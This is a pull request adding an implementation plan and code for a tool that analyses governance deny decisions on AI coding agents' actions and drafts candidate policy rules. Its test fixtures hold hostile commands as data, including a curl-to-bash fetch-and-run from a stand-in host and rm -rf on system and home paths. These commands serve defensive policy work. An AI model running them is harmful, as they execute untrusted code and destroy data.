### PR TITLE
feat(analysis): decisions stream — repeat-pattern detection + candidate rule drafts

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -60,3 +60,12 @@ graphify-out/cost.json
 graphify-out/manifest.json
 graphify-out/graph.html
 graphify-out/graph.json
+
+# Analysis stream outputs
+python/analysis/out/
+
+# Python build / venv artifacts
+python/analysis/*.egg-info/
+python/analysis/.pytest_cache/
+__pycache__/
+*.pyc

--- a/docs/superpowers/plans/2026-04-30-analysis-decisions.md
+++ b/docs/superpowers/plans/2026-04-30-analysis-decisions.md
@@ -1,0 +1,2912 @@
+# Analysis: Decisions Stream Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Ship the decisions analysis stream end-to-end so `python -m analysis.decisions --window 7d` reads `$HOME/.chitin/gov-decisions-*.jsonl`, ranks deny patterns, drafts candidate rules, and writes JSON + markdown for the 2026-05-07 talk demo.
+
+**Architecture:** Layered Python package at `python/analysis/`. Layer 1 (deterministic detection + heuristic templates) is the demo path. Layer 2 (LLM-drafted rules) is opt-in. JSON canonical / markdown projection mirrors F4's chain-canonical / OTEL-projection shape. Foundation (loaders, types, writers) extracted so debt + soul-routing streams plug in post-talk as ~1-day additions.
+
+**Tech Stack:** Python 3.11+, stdlib only for Layer 1, `pyyaml` for rule emission. Layer 2 uses ollama (qwen3-coder) via HTTP. No frameworks, no DB.
+
+**Spec:** `docs/superpowers/specs/2026-04-30-analysis-decisions-design.md`.
+
+---
+
+## File Structure
+
+```
+python/analysis/
+├── pyproject.toml              # Task 1
+├── __init__.py                 # Task 1
+├── types.py                    # Task 2
+├── loaders.py                  # Task 3
+├── detect.py                   # Task 4
+├── draft.py                    # Task 5  (registry + dispatch)
+├── templates/
+│   ├── __init__.py             # Task 5  (registry impl)
+│   ├── no_destructive_rm.py    # Task 6
+│   ├── bounds_max_files_changed.py  # Task 7
+│   ├── no_curl_pipe_bash.py    # Task 8
+│   └── no_force_push.py        # Task 9
+├── impact.py                   # Task 10  (predicted_impact computation)
+├── writers.py                  # Tasks 11+12  (JSON, markdown)
+├── decisions.py                # Task 13  (main entry / CLI)
+├── debt.py                     # Task 14  (foundation-generalization stub)
+├── souls.py                    # Task 14  (foundation-generalization stub)
+├── llm_draft.py                # Task 15  (Layer 2, opt-in)
+└── tests/
+    ├── __init__.py
+    ├── conftest.py             # Task 1
+    ├── fixtures/
+    │   └── gov-decisions-fixture.jsonl  # Task 2
+    ├── test_types.py           # Task 2
+    ├── test_loaders.py         # Task 3
+    ├── test_detect.py          # Task 4
+    ├── test_draft_registry.py  # Task 5
+    ├── test_template_no_destructive_rm.py  # Task 6
+    ├── test_template_bounds_max_files.py   # Task 7
+    ├── test_template_no_curl_pipe_bash.py  # Task 8
+    ├── test_template_no_force_push.py      # Task 9
+    ├── test_impact.py          # Task 10
+    ├── test_writers_json.py    # Task 11
+    ├── test_writers_markdown.py  # Task 12
+    ├── test_cli.py             # Task 13
+    ├── test_stubs.py           # Task 14
+    ├── test_llm_draft.py       # Task 15
+    └── test_e2e.py             # Task 16
+```
+
+Output goes to `python/analysis/out/` (gitignored).
+
+---
+
+## Task 1: Scaffold the package
+
+**Files:**
+- Create: `python/analysis/pyproject.toml`
+- Create: `python/analysis/__init__.py`
+- Create: `python/analysis/tests/__init__.py`
+- Create: `python/analysis/tests/conftest.py`
+- Modify: `.gitignore` (add `python/analysis/out/`)
+
+- [ ] **Step 1: Create the package directory and pyproject.toml**
+
+```toml
+# python/analysis/pyproject.toml
+[project]
+name = "chitin-analysis"
+version = "0.1.0"
+description = "Analysis layer for chitin gov-decisions and event chains"
+requires-python = ">=3.11"
+dependencies = [
+    "pyyaml>=6.0",
+]
+
+[project.optional-dependencies]
+dev = [
+    "pytest>=7.0",
+]
+
+[build-system]
+requires = ["setuptools>=64"]
+build-backend = "setuptools.build_meta"
+
+[tool.setuptools.packages.find]
+where = ["."]
+include = ["analysis*"]
+
+[tool.pytest.ini_options]
+testpaths = ["tests"]
+python_files = ["test_*.py"]
+```
+
+- [ ] **Step 2: Create empty package init**
+
+```python
+# python/analysis/__init__.py
+"""chitin analysis layer — decisions, debt, soul-routing streams."""
+__version__ = "0.1.0"
+```
+
+- [ ] **Step 3: Create test conftest**
+
+```python
+# python/analysis/tests/conftest.py
+"""Shared pytest fixtures for analysis tests."""
+from pathlib import Path
+
+import pytest
+
+
+@pytest.fixture
+def fixtures_dir() -> Path:
+    """Path to the test fixtures directory."""
+    return Path(__file__).parent / "fixtures"
+```
+
+- [ ] **Step 4: Add gitignore entry**
+
+Modify `.gitignore` — add at end:
+
+```
+# Analysis stream outputs
+python/analysis/out/
+```
+
+- [ ] **Step 5: Verify package installs**
+
+Run: `cd python/analysis && pip install -e ".[dev]"`
+Expected: install succeeds, `pytest --collect-only` reports 0 tests collected.
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add python/analysis/pyproject.toml python/analysis/__init__.py python/analysis/tests/__init__.py python/analysis/tests/conftest.py .gitignore
+git commit -m "feat(analysis): scaffold python/analysis/ package"
+```
+
+---
+
+## Task 2: Decision dataclass + line parser
+
+**Files:**
+- Create: `python/analysis/types.py`
+- Create: `python/analysis/tests/fixtures/gov-decisions-fixture.jsonl`
+- Create: `python/analysis/tests/test_types.py`
+
+The Decision dataclass mirrors the gov-decisions JSONL schema observed in `$HOME/.chitin/gov-decisions-*.jsonl`. Sample line:
+```json
+{"ts":"2026-04-29T10:15:32Z","allowed":false,"mode":"enforce","rule_id":"no-destructive-rm","reason":"...","escalation":false,"agent":"copilot-cli","action_type":"shell.exec","action_target":"rm -rf /tmp/foo","envelope_id":"env_abc123","tier":"T0","cost_usd":0.0,"input_bytes":42,"tool_calls":1}
+```
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_types.py
+"""Tests for Decision dataclass + parsing."""
+from datetime import datetime, timezone
+
+from analysis.types import Decision, parse_decision_line
+
+
+def test_parse_full_decision_line():
+    line = (
+        '{"ts":"2026-04-29T10:15:32Z","allowed":false,"mode":"enforce",'
+        '"rule_id":"no-destructive-rm","reason":"matched destructive pattern",'
+        '"escalation":false,"agent":"copilot-cli","action_type":"shell.exec",'
+        '"action_target":"rm -rf /tmp/foo","envelope_id":"env_abc123",'
+        '"tier":"T0","cost_usd":0.0,"input_bytes":42,"tool_calls":1}'
+    )
+    d = parse_decision_line(line)
+    assert d is not None
+    assert d.ts == datetime(2026, 4, 29, 10, 15, 32, tzinfo=timezone.utc)
+    assert d.allowed is False
+    assert d.rule_id == "no-destructive-rm"
+    assert d.agent == "copilot-cli"
+    assert d.action_type == "shell.exec"
+    assert d.action_target == "rm -rf /tmp/foo"
+    assert d.envelope_id == "env_abc123"
+
+
+def test_parse_decision_with_missing_optional_fields():
+    line = '{"ts":"2026-04-29T10:15:32Z","allowed":true,"mode":"enforce"}'
+    d = parse_decision_line(line)
+    assert d is not None
+    assert d.allowed is True
+    assert d.rule_id is None
+    assert d.agent is None
+    assert d.action_type is None
+
+
+def test_parse_malformed_json_returns_none():
+    assert parse_decision_line("not valid json") is None
+    assert parse_decision_line("") is None
+    assert parse_decision_line("{") is None
+
+
+def test_parse_missing_ts_returns_none():
+    line = '{"allowed":false,"rule_id":"x"}'
+    assert parse_decision_line(line) is None
+
+
+def test_parse_malformed_ts_returns_none():
+    line = '{"ts":"not-a-timestamp","allowed":false}'
+    assert parse_decision_line(line) is None
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_types.py -v`
+Expected: FAIL with `ModuleNotFoundError: No module named 'analysis.types'`
+
+- [ ] **Step 3: Implement Decision + parser**
+
+```python
+# python/analysis/types.py
+"""Core types for the analysis layer."""
+from __future__ import annotations
+
+import json
+from dataclasses import dataclass, field
+from datetime import datetime
+from typing import Optional
+
+
+@dataclass(frozen=True)
+class Decision:
+    """One row from gov-decisions-*.jsonl."""
+
+    ts: datetime
+    allowed: bool
+    mode: Optional[str] = None
+    rule_id: Optional[str] = None
+    reason: Optional[str] = None
+    escalation: bool = False
+    agent: Optional[str] = None
+    action_type: Optional[str] = None
+    action_target: Optional[str] = None
+    envelope_id: Optional[str] = None
+    tier: Optional[str] = None
+    cost_usd: float = 0.0
+    input_bytes: int = 0
+    tool_calls: int = 0
+
+
+def parse_decision_line(line: str) -> Optional[Decision]:
+    """Parse a single JSONL line into a Decision. Returns None on any error.
+
+    Bad input never raises — analysis tolerates audit-log corruption.
+    """
+    line = line.strip()
+    if not line:
+        return None
+    try:
+        raw = json.loads(line)
+    except json.JSONDecodeError:
+        return None
+    if not isinstance(raw, dict):
+        return None
+    ts_str = raw.get("ts")
+    if not isinstance(ts_str, str):
+        return None
+    try:
+        ts = datetime.fromisoformat(ts_str.replace("Z", "+00:00"))
+    except (ValueError, TypeError):
+        return None
+    return Decision(
+        ts=ts,
+        allowed=bool(raw.get("allowed", False)),
+        mode=raw.get("mode"),
+        rule_id=raw.get("rule_id"),
+        reason=raw.get("reason"),
+        escalation=bool(raw.get("escalation", False)),
+        agent=raw.get("agent"),
+        action_type=raw.get("action_type"),
+        action_target=raw.get("action_target"),
+        envelope_id=raw.get("envelope_id"),
+        tier=raw.get("tier"),
+        cost_usd=float(raw.get("cost_usd", 0.0)),
+        input_bytes=int(raw.get("input_bytes", 0)),
+        tool_calls=int(raw.get("tool_calls", 0)),
+    )
+
+
+@dataclass(frozen=True)
+class Pattern:
+    """A repeat (rule_id, action_type, agent_id) tuple over the window."""
+
+    rule_id: str
+    action_type: str
+    agent_id: str
+    count: int
+    first_seen: datetime
+    last_seen: datetime
+    decision_class: str  # "deny" or "allow"
+    sample_envelope_ids: tuple[str, ...]
+    decisions: tuple[Decision, ...] = field(repr=False, default=())
+
+
+@dataclass(frozen=True)
+class PredictedImpact:
+    samples_evaluated: int
+    would_allow: int
+    would_still_deny: int
+    method: str
+
+
+@dataclass(frozen=True)
+class RuleDraft:
+    kind: str  # "heuristic" | "heuristic-fallback" | "llm"
+    template: str
+    confidence: str  # "low" | "medium" | "high"
+    rule_yaml: str
+    predicted_impact: PredictedImpact
+    notes: str = ""
+```
+
+- [ ] **Step 4: Create test fixture**
+
+```jsonl
+# python/analysis/tests/fixtures/gov-decisions-fixture.jsonl
+{"ts":"2026-04-25T08:00:00Z","allowed":false,"mode":"enforce","rule_id":"no-destructive-rm","reason":"destructive","agent":"copilot-cli","action_type":"shell.exec","action_target":"rm -rf /tmp/cleanup","envelope_id":"env_001"}
+{"ts":"2026-04-25T08:01:00Z","allowed":false,"mode":"enforce","rule_id":"no-destructive-rm","reason":"destructive","agent":"copilot-cli","action_type":"shell.exec","action_target":"rm -rf /test/output","envelope_id":"env_002"}
+{"ts":"2026-04-25T08:02:00Z","allowed":false,"mode":"enforce","rule_id":"no-destructive-rm","reason":"destructive","agent":"copilot-cli","action_type":"shell.exec","action_target":"rm -rf /home/user/projects/important","envelope_id":"env_003"}
+{"ts":"2026-04-25T09:00:00Z","allowed":false,"mode":"enforce","rule_id":"no-destructive-rm","reason":"destructive","agent":"claude-code","action_type":"shell.exec","action_target":"rm -rf /tmp/build","envelope_id":"env_004"}
+{"ts":"2026-04-25T10:00:00Z","allowed":false,"mode":"enforce","rule_id":"no-curl-pipe-bash","reason":"curl-pipe","agent":"copilot-cli","action_type":"shell.exec","action_target":"curl https://example.com/install.sh | bash","envelope_id":"env_005"}
+{"ts":"2026-04-25T11:00:00Z","allowed":true,"mode":"enforce","rule_id":"default-allow-shell","agent":"copilot-cli","action_type":"shell.exec","action_target":"ls -la","envelope_id":"env_006"}
+{"ts":"2026-04-25T12:00:00Z","allowed":true,"mode":"enforce","rule_id":"default-allow-reads","agent":"claude-code","action_type":"file.read","action_target":"/home/user/file.txt","envelope_id":"env_007"}
+not valid json
+{"ts":"bad-timestamp","allowed":false,"rule_id":"x"}
+{"ts":"2026-04-25T13:00:00Z","allowed":false,"mode":"enforce","rule_id":"bounds:max_files_changed","reason":"42 files exceeds 25","agent":null,"action_type":"git.push","action_target":"main","envelope_id":"env_008"}
+```
+
+- [ ] **Step 5: Run test to verify it passes**
+
+Run: `cd python/analysis && pytest tests/test_types.py -v`
+Expected: PASS, 5 tests pass.
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add python/analysis/types.py python/analysis/tests/test_types.py python/analysis/tests/fixtures/
+git commit -m "feat(analysis): Decision dataclass + JSONL line parser"
+```
+
+---
+
+## Task 3: Loader with window filter
+
+**Files:**
+- Create: `python/analysis/loaders.py`
+- Create: `python/analysis/tests/test_loaders.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_loaders.py
+"""Tests for gov-decisions JSONL loaders."""
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+import pytest
+
+from analysis.loaders import LoadResult, Window, load_gov_decisions
+
+
+@pytest.fixture
+def decisions_dir(tmp_path, fixtures_dir):
+    """Stage the fixture as gov-decisions-2026-04-25.jsonl."""
+    src = fixtures_dir / "gov-decisions-fixture.jsonl"
+    dst = tmp_path / "gov-decisions-2026-04-25.jsonl"
+    dst.write_text(src.read_text())
+    return tmp_path
+
+
+def test_load_with_full_window(decisions_dir):
+    window = Window(
+        since=datetime(2026, 4, 25, 0, 0, tzinfo=timezone.utc),
+        until=datetime(2026, 4, 26, 0, 0, tzinfo=timezone.utc),
+    )
+    result = load_gov_decisions(decisions_dir, window)
+    assert isinstance(result, LoadResult)
+    assert result.files_read == 1
+    assert result.parse_errors == 2  # one bad json line, one bad ts
+    assert len(result.decisions) == 8
+
+
+def test_load_with_narrow_window_excludes_outside(decisions_dir):
+    window = Window(
+        since=datetime(2026, 4, 25, 9, 0, tzinfo=timezone.utc),
+        until=datetime(2026, 4, 25, 11, 0, tzinfo=timezone.utc),
+    )
+    result = load_gov_decisions(decisions_dir, window)
+    # ts >= since AND ts < until → 09:00 (in), 10:00 (in), 11:00 (out)
+    envelope_ids = {d.envelope_id for d in result.decisions}
+    assert envelope_ids == {"env_004", "env_005"}
+
+
+def test_load_with_empty_dir(tmp_path):
+    window = Window(
+        since=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        until=datetime(2026, 4, 26, tzinfo=timezone.utc),
+    )
+    result = load_gov_decisions(tmp_path, window)
+    assert result.files_read == 0
+    assert result.decisions == []
+    assert result.parse_errors == 0
+
+
+def test_load_skips_non_matching_filenames(tmp_path, fixtures_dir):
+    src = fixtures_dir / "gov-decisions-fixture.jsonl"
+    (tmp_path / "gov-decisions-2026-04-25.jsonl").write_text(src.read_text())
+    (tmp_path / "other-file.jsonl").write_text("ignored\n")
+    (tmp_path / "gov-decisions.txt").write_text("ignored\n")
+    window = Window(
+        since=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        until=datetime(2026, 4, 26, tzinfo=timezone.utc),
+    )
+    result = load_gov_decisions(tmp_path, window)
+    assert result.files_read == 1
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_loaders.py -v`
+Expected: FAIL with `ModuleNotFoundError: No module named 'analysis.loaders'`
+
+- [ ] **Step 3: Implement loader**
+
+```python
+# python/analysis/loaders.py
+"""Load gov-decisions JSONL files with window filtering."""
+from __future__ import annotations
+
+import re
+from dataclasses import dataclass
+from datetime import datetime
+from pathlib import Path
+
+from analysis.types import Decision, parse_decision_line
+
+GOV_DECISIONS_PATTERN = re.compile(r"^gov-decisions-\d{4}-\d{2}-\d{2}\.jsonl$")
+
+
+@dataclass(frozen=True)
+class Window:
+    """Half-open time window: ts >= since AND ts < until."""
+
+    since: datetime
+    until: datetime
+
+
+@dataclass(frozen=True)
+class LoadResult:
+    decisions: list[Decision]
+    files_read: int
+    parse_errors: int
+
+
+def load_gov_decisions(decisions_dir: Path, window: Window) -> LoadResult:
+    """Load all gov-decisions-*.jsonl files in dir, filter to window.
+
+    Bad lines are counted in parse_errors and skipped — never raise.
+    """
+    decisions_dir = Path(decisions_dir)
+    if not decisions_dir.exists():
+        return LoadResult(decisions=[], files_read=0, parse_errors=0)
+
+    decisions: list[Decision] = []
+    parse_errors = 0
+    files_read = 0
+
+    for path in sorted(decisions_dir.iterdir()):
+        if not GOV_DECISIONS_PATTERN.match(path.name):
+            continue
+        files_read += 1
+        with path.open("r") as f:
+            for line in f:
+                d = parse_decision_line(line)
+                if d is None:
+                    if line.strip():
+                        parse_errors += 1
+                    continue
+                if window.since <= d.ts < window.until:
+                    decisions.append(d)
+
+    return LoadResult(
+        decisions=decisions,
+        files_read=files_read,
+        parse_errors=parse_errors,
+    )
+
+
+def parse_window_str(s: str, now: datetime) -> Window:
+    """Parse '7d' / '24h' / '60m' as a window ending at now."""
+    if s.endswith("d"):
+        days = int(s[:-1])
+        from datetime import timedelta
+        return Window(since=now - timedelta(days=days), until=now)
+    if s.endswith("h"):
+        hours = int(s[:-1])
+        from datetime import timedelta
+        return Window(since=now - timedelta(hours=hours), until=now)
+    if s.endswith("m"):
+        minutes = int(s[:-1])
+        from datetime import timedelta
+        return Window(since=now - timedelta(minutes=minutes), until=now)
+    raise ValueError(f"Unrecognized window: {s!r}. Use Nd, Nh, or Nm.")
+```
+
+- [ ] **Step 4: Run test to verify it passes**
+
+Run: `cd python/analysis && pytest tests/test_loaders.py -v`
+Expected: PASS, 4 tests pass.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/loaders.py python/analysis/tests/test_loaders.py
+git commit -m "feat(analysis): JSONL loader with half-open window filtering"
+```
+
+---
+
+## Task 4: Pattern detection (group + rank + tie-break)
+
+**Files:**
+- Create: `python/analysis/detect.py`
+- Create: `python/analysis/tests/test_detect.py`
+
+- [ ] **Step 1: Write the failing tests**
+
+```python
+# python/analysis/tests/test_detect.py
+"""Tests for pattern detection."""
+from datetime import datetime, timezone
+
+import pytest
+
+from analysis.detect import detect_patterns
+from analysis.types import Decision
+
+
+def _decision(ts="2026-04-25T08:00:00Z", allowed=False, rule_id="r1",
+              action_type="shell.exec", agent="copilot-cli", envelope_id="e1"):
+    return Decision(
+        ts=datetime.fromisoformat(ts.replace("Z", "+00:00")),
+        allowed=allowed,
+        rule_id=rule_id,
+        action_type=action_type,
+        agent=agent,
+        envelope_id=envelope_id,
+    )
+
+
+def test_empty_input_returns_empty():
+    assert detect_patterns([]) == []
+
+
+def test_single_decision_one_pattern():
+    patterns = detect_patterns([_decision()])
+    assert len(patterns) == 1
+    assert patterns[0].count == 1
+    assert patterns[0].rule_id == "r1"
+
+
+def test_all_allows_returns_empty():
+    """v1 ranks denies only."""
+    decisions = [_decision(allowed=True, envelope_id=f"e{i}") for i in range(5)]
+    assert detect_patterns(decisions) == []
+
+
+def test_three_same_pattern():
+    decisions = [_decision(envelope_id=f"e{i}") for i in range(3)]
+    patterns = detect_patterns(decisions)
+    assert len(patterns) == 1
+    assert patterns[0].count == 3
+
+
+def test_count_descending_ranking():
+    decisions = [
+        # 3x rule_a
+        _decision(rule_id="rule_a", envelope_id="e1"),
+        _decision(rule_id="rule_a", envelope_id="e2"),
+        _decision(rule_id="rule_a", envelope_id="e3"),
+        # 5x rule_b
+        *[_decision(rule_id="rule_b", envelope_id=f"eb{i}") for i in range(5)],
+        # 1x rule_c
+        _decision(rule_id="rule_c", envelope_id="ec1"),
+    ]
+    patterns = detect_patterns(decisions)
+    counts = [p.count for p in patterns]
+    assert counts == [5, 3, 1]
+    rules = [p.rule_id for p in patterns]
+    assert rules == ["rule_b", "rule_a", "rule_c"]
+
+
+def test_tie_breaker_alphabetic_on_rule_id():
+    decisions = [
+        _decision(rule_id="zeta", envelope_id="e1"),
+        _decision(rule_id="zeta", envelope_id="e2"),
+        _decision(rule_id="alpha", envelope_id="ea1"),
+        _decision(rule_id="alpha", envelope_id="ea2"),
+    ]
+    patterns = detect_patterns(decisions)
+    # Both have count=2, alpha sorts before zeta
+    assert [p.rule_id for p in patterns] == ["alpha", "zeta"]
+
+
+def test_tie_breaker_secondary_on_action_type():
+    decisions = [
+        _decision(rule_id="r", action_type="zzz", envelope_id="e1"),
+        _decision(rule_id="r", action_type="aaa", envelope_id="e2"),
+    ]
+    patterns = detect_patterns(decisions)
+    assert [p.action_type for p in patterns] == ["aaa", "zzz"]
+
+
+def test_tie_breaker_tertiary_on_agent():
+    decisions = [
+        _decision(rule_id="r", action_type="t", agent="zzz", envelope_id="e1"),
+        _decision(rule_id="r", action_type="t", agent="aaa", envelope_id="e2"),
+    ]
+    patterns = detect_patterns(decisions)
+    assert [p.agent_id for p in patterns] == ["aaa", "zzz"]
+
+
+def test_null_rule_id_bucketed_as_none():
+    decisions = [_decision(rule_id=None, envelope_id="e1")]
+    patterns = detect_patterns(decisions)
+    assert patterns[0].rule_id == "<none>"
+
+
+def test_null_agent_bucketed_as_unknown():
+    decisions = [_decision(agent=None, envelope_id="e1")]
+    patterns = detect_patterns(decisions)
+    assert patterns[0].agent_id == "<unknown>"
+
+
+def test_first_last_seen_correct():
+    decisions = [
+        _decision(ts="2026-04-25T12:00:00Z", envelope_id="e1"),
+        _decision(ts="2026-04-25T08:00:00Z", envelope_id="e2"),
+        _decision(ts="2026-04-25T15:00:00Z", envelope_id="e3"),
+    ]
+    patterns = detect_patterns(decisions)
+    assert patterns[0].first_seen == datetime(2026, 4, 25, 8, 0, tzinfo=timezone.utc)
+    assert patterns[0].last_seen == datetime(2026, 4, 25, 15, 0, tzinfo=timezone.utc)
+
+
+def test_sample_envelope_ids_are_first_three():
+    decisions = [_decision(envelope_id=f"env_{i:03d}") for i in range(5)]
+    patterns = detect_patterns(decisions)
+    assert patterns[0].sample_envelope_ids == ("env_000", "env_001", "env_002")
+
+
+def test_determinism_two_runs_byte_equal():
+    decisions = [
+        _decision(rule_id="b", envelope_id="e1"),
+        _decision(rule_id="a", envelope_id="e2"),
+        _decision(rule_id="b", envelope_id="e3"),
+    ]
+    a = detect_patterns(decisions)
+    b = detect_patterns(decisions)
+    assert a == b
+    assert [(p.rule_id, p.count) for p in a] == [(p.rule_id, p.count) for p in b]
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_detect.py -v`
+Expected: FAIL with `ModuleNotFoundError: No module named 'analysis.detect'`
+
+- [ ] **Step 3: Implement detect_patterns**
+
+```python
+# python/analysis/detect.py
+"""Pattern detection: group decisions by (rule_id, action_type, agent), rank."""
+from __future__ import annotations
+
+from collections import defaultdict
+from typing import Iterable
+
+from analysis.types import Decision, Pattern
+
+
+def detect_patterns(decisions: Iterable[Decision]) -> list[Pattern]:
+    """Group decisions by (rule_id, action_type, agent_id) and rank by count desc.
+
+    v1 invariants:
+      - Only denies are ranked (allowed=False).
+      - Tie-breaker: alphabetic on rule_id → action_type → agent_id (stable).
+      - Null/missing fields bucket as '<none>' / '<unknown>'.
+    """
+    buckets: dict[tuple[str, str, str], list[Decision]] = defaultdict(list)
+    for d in decisions:
+        if d.allowed:
+            continue
+        key = (
+            d.rule_id or "<none>",
+            d.action_type or "<none>",
+            d.agent or "<unknown>",
+        )
+        buckets[key].append(d)
+
+    keys_sorted = sorted(
+        buckets.keys(),
+        key=lambda k: (-len(buckets[k]), k[0], k[1], k[2]),
+    )
+
+    patterns: list[Pattern] = []
+    for key in keys_sorted:
+        bucket = buckets[key]
+        bucket_sorted = sorted(bucket, key=lambda d: (d.ts, d.envelope_id or ""))
+        first_seen = bucket_sorted[0].ts
+        last_seen = bucket_sorted[-1].ts
+        sample_ids = tuple(
+            d.envelope_id for d in bucket_sorted[:3] if d.envelope_id
+        )
+        patterns.append(Pattern(
+            rule_id=key[0],
+            action_type=key[1],
+            agent_id=key[2],
+            count=len(bucket),
+            first_seen=first_seen,
+            last_seen=last_seen,
+            decision_class="deny",
+            sample_envelope_ids=sample_ids,
+            decisions=tuple(bucket_sorted),
+        ))
+    return patterns
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_detect.py -v`
+Expected: PASS, 12 tests pass.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/detect.py python/analysis/tests/test_detect.py
+git commit -m "feat(analysis): pattern detection with stable tie-breaker"
+```
+
+---
+
+## Task 5: Template registry + dispatch
+
+**Files:**
+- Create: `python/analysis/templates/__init__.py`
+- Create: `python/analysis/draft.py`
+- Create: `python/analysis/tests/test_draft_registry.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_draft_registry.py
+"""Tests for the template registry and draft dispatch."""
+from datetime import datetime, timezone
+
+from analysis.draft import draft_for_pattern
+from analysis.types import Pattern
+
+
+def _pattern(rule_id="unknown_rule", count=5):
+    return Pattern(
+        rule_id=rule_id,
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=count,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=("e1", "e2", "e3"),
+        decisions=(),
+    )
+
+
+def test_unknown_rule_id_returns_none():
+    assert draft_for_pattern(_pattern(rule_id="totally_unknown")) is None
+
+
+def test_registry_lookup_by_rule_id():
+    """Templates are registered keyed on rule_id."""
+    from analysis.templates import REGISTRY
+    assert isinstance(REGISTRY, dict)
+    # At minimum the registry exists; specific entries added per task.
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_draft_registry.py -v`
+Expected: FAIL with `ModuleNotFoundError: No module named 'analysis.draft'`
+
+- [ ] **Step 3: Implement registry + dispatch**
+
+```python
+# python/analysis/templates/__init__.py
+"""Template registry. Each entry maps a rule_id to a draft function.
+
+A template function takes a Pattern and returns a RuleDraft, or None if the
+template can't draft for this specific pattern.
+"""
+from __future__ import annotations
+
+from typing import Callable, Optional
+
+from analysis.types import Pattern, RuleDraft
+
+TemplateFunc = Callable[[Pattern], Optional[RuleDraft]]
+
+REGISTRY: dict[str, TemplateFunc] = {}
+
+
+def register(rule_id: str, fn: TemplateFunc) -> None:
+    """Register a template function for a rule_id."""
+    REGISTRY[rule_id] = fn
+```
+
+```python
+# python/analysis/draft.py
+"""Dispatch a Pattern to its template, returning a RuleDraft or None."""
+from __future__ import annotations
+
+from typing import Optional
+
+from analysis.templates import REGISTRY
+from analysis.types import Pattern, RuleDraft
+
+
+def draft_for_pattern(pattern: Pattern) -> Optional[RuleDraft]:
+    """Look up a template by rule_id and produce a draft.
+
+    Returns None if no template is registered for this rule_id, OR if the
+    template returns None (e.g., the pattern doesn't match the template's
+    heuristic).
+    """
+    fn = REGISTRY.get(pattern.rule_id)
+    if fn is None:
+        return None
+    return fn(pattern)
+
+
+def reason_no_template(pattern: Pattern) -> str:
+    """Human-readable explanation for why no draft was generated."""
+    if pattern.rule_id not in REGISTRY:
+        return f"no template registered for rule_id={pattern.rule_id!r}"
+    return f"template for {pattern.rule_id!r} declined this pattern"
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_draft_registry.py -v`
+Expected: PASS, 2 tests pass.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/templates/__init__.py python/analysis/draft.py python/analysis/tests/test_draft_registry.py
+git commit -m "feat(analysis): template registry + draft dispatch"
+```
+
+---
+
+## Task 6: Template — `no-destructive-rm`
+
+The headline pattern. 30 denies in real data. Template proposes an exemption for known-safe directories (`/tmp/`, `/test/`, `out/`, `graphify-out/`).
+
+**Files:**
+- Create: `python/analysis/templates/no_destructive_rm.py`
+- Create: `python/analysis/tests/test_template_no_destructive_rm.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_template_no_destructive_rm.py
+"""Tests for the no-destructive-rm heuristic template."""
+from datetime import datetime, timezone
+
+from analysis.templates.no_destructive_rm import draft
+from analysis.types import Decision, Pattern
+
+
+def _pattern_with_targets(*targets):
+    decisions = tuple(
+        Decision(
+            ts=datetime(2026, 4, 25, 8, i, tzinfo=timezone.utc),
+            allowed=False,
+            rule_id="no-destructive-rm",
+            action_type="shell.exec",
+            action_target=t,
+            agent="copilot-cli",
+            envelope_id=f"e{i}",
+        )
+        for i, t in enumerate(targets)
+    )
+    return Pattern(
+        rule_id="no-destructive-rm",
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=len(targets),
+        first_seen=decisions[0].ts,
+        last_seen=decisions[-1].ts,
+        decision_class="deny",
+        sample_envelope_ids=tuple(d.envelope_id for d in decisions[:3]),
+        decisions=decisions,
+    )
+
+
+def test_safe_dirs_are_drafted_as_allow_exception():
+    p = _pattern_with_targets(
+        "rm -rf /tmp/cleanup",
+        "rm -rf /test/output",
+        "rm -rf out/build",
+        "rm -rf graphify-out/wiki",
+    )
+    d = draft(p)
+    assert d is not None
+    assert d.kind == "heuristic"
+    assert d.template == "no_destructive_rm"
+    assert "no-destructive-rm-safe-dirs" in d.rule_yaml
+    assert d.predicted_impact.samples_evaluated == 4
+    assert d.predicted_impact.would_allow == 4
+    assert d.predicted_impact.would_still_deny == 0
+
+
+def test_mixed_targets_split_correctly():
+    p = _pattern_with_targets(
+        "rm -rf /tmp/cleanup",         # safe
+        "rm -rf /etc/passwd",           # NOT safe
+        "rm -rf /home/user/important",  # NOT safe
+    )
+    d = draft(p)
+    assert d is not None
+    assert d.predicted_impact.would_allow == 1
+    assert d.predicted_impact.would_still_deny == 2
+
+
+def test_pattern_with_no_safe_targets_returns_none():
+    p = _pattern_with_targets(
+        "rm -rf /etc/passwd",
+        "rm -rf /home/user/important",
+    )
+    d = draft(p)
+    assert d is None  # No exception worth proposing.
+
+
